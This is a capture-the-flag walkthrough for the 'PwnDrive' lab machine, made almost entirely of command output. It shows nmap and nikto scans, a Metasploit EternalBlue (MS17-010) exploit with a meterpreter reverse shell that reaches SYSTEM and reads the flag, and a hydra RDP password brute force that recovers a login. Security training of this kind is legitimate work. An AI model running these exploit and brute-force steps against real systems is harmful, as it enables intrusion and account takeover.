Penetration Testing Foundations
PwnTillDawnAcademyIsAwesome!!!
nmap -sC -sV -sU 10.150.150.11 -p 137,161
PORT STATE SERVICE VERSION
137/udp open netbios-ns Microsoft Windows or Samba netbios-ns (workgroup: WORKGROUP)
161/udp closed snmp
Service Info: Host: PWNDRIVE
nmap -sC -sV 10.150.150.11
PORT STATE SERVICE VERSION
21/tcp open ftp Xlight ftpd 3.9
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.9)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.9
|_http-title: PwnDrive - Your Personal Online Storage
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.9)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.9
|_http-title: PwnDrive - Your Personal Online Storage
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows Server 2008 R2 Enterprise 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.2100.00; RTM
| ms-sql-ntlm-info:
| Target_Name: PWNDRIVE
| NetBIOS_Domain_Name: PWNDRIVE
| NetBIOS_Computer_Name: PWNDRIVE
| DNS_Domain_Name: PwnDrive
| DNS_Computer_Name: PwnDrive
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-08-24T13:11:13
|_Not valid after: 2050-08-24T13:11:13
|_ssl-date: 2022-01-08T10:17:11+00:00; +47m25s from scanner time.
3306/tcp open mysql MySQL 5.5.5-10.4.14-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.14-MariaDB
| Thread ID: 1134
| Capabilities flags: 63486
| Some Capabilities: Speaks41ProtocolOld, ODBCClient, Speaks41ProtocolNew, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, LongColumnFlag, InteractiveClient, Support41Auth, ConnectWithDatabase, SupportsTransactions, SupportsLoadDataLocal, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: 'BXt]ToS04V5D5z-l[aX
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2022-01-08T10:17:10+00:00; +47m24s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h07m24s, deviation: 3h15m58s, median: 47m24s
| ms-sql-info:
| 10.150.150.11:1433:
| Version:
| name: Microsoft SQL Server 2012 RTM
| number: 11.00.2100.00
| Product: Microsoft SQL Server 2012
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_nbstat: NetBIOS name: PWNDRIVE, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:89:87:cb (VMware)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1 (Windows Server 2008 R2 Enterprise 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: PwnDrive
| NetBIOS computer name: PWNDRIVE\\x00
| Workgroup: WORKGROUP\\x00
|_ System time: 2022-01-08T02:17:00-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-08T10:17:00
|_ start_date: 2020-08-24T13:11:20
nmap --script "smb-vuln*" 10.150.150.11
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>
| <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>
|_ <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>
nikto -host 10.150.150.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.150.150.11
+ Target Hostname: 10.150.150.11
+ Target Port: 80
+ Start Time: 2022-01-08 09:42:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.9
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.4.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See <http://www.wisec.it/sectou.php?id=4698ebdc59d15>. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /Admin/: Directory indexing found.
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
+ /login.php: Admin login page/section found.
+ 8703 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2022-01-08 10:58:19 (GMT-5) (4550 seconds)
---------------------------------------------------------------------------
msf6 > exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0
lhost => tun0
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.150.150.11
rhost => 10.150.150.11
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 10.150.150.11:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.150.150.11:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.11:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.150.150.11:445 - The target is vulnerable.
meterpreter > sysinfo
Computer : PWNDRIVE
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\\SYSTEM
meterpreter > pwd
C:\\Windows\\system32
Get out of system32 because ls command does not work, it jams when the files are too much
Root Flag is at C:\\Users\\Administrator\\Desktop
meterpreter > cat FLAG1.txt
PwnTillDawnAcademyIsAwesome!!!
hydra -l tony -P /usr/share/wordlists/rockyou.txt.gz rdp://10.150.150.11
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) starting at 2022-01-08 09:21:24
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking rdp://10.150.150.11:3389/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ERROR] freerdp: The connection failed to establish.
[VERBOSE] Retrying connection for child 1
[STATUS] 67.00 tries/min, 67 tries in 00:01h, 14344332 to do in 3568:15h, 4 active
**[3389][rdp] host: 10.150.150.11 login: tony password: blink182**
[STATUS] attack finished for 10.150.150.11 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) finished at 2022-01-08 09:24:20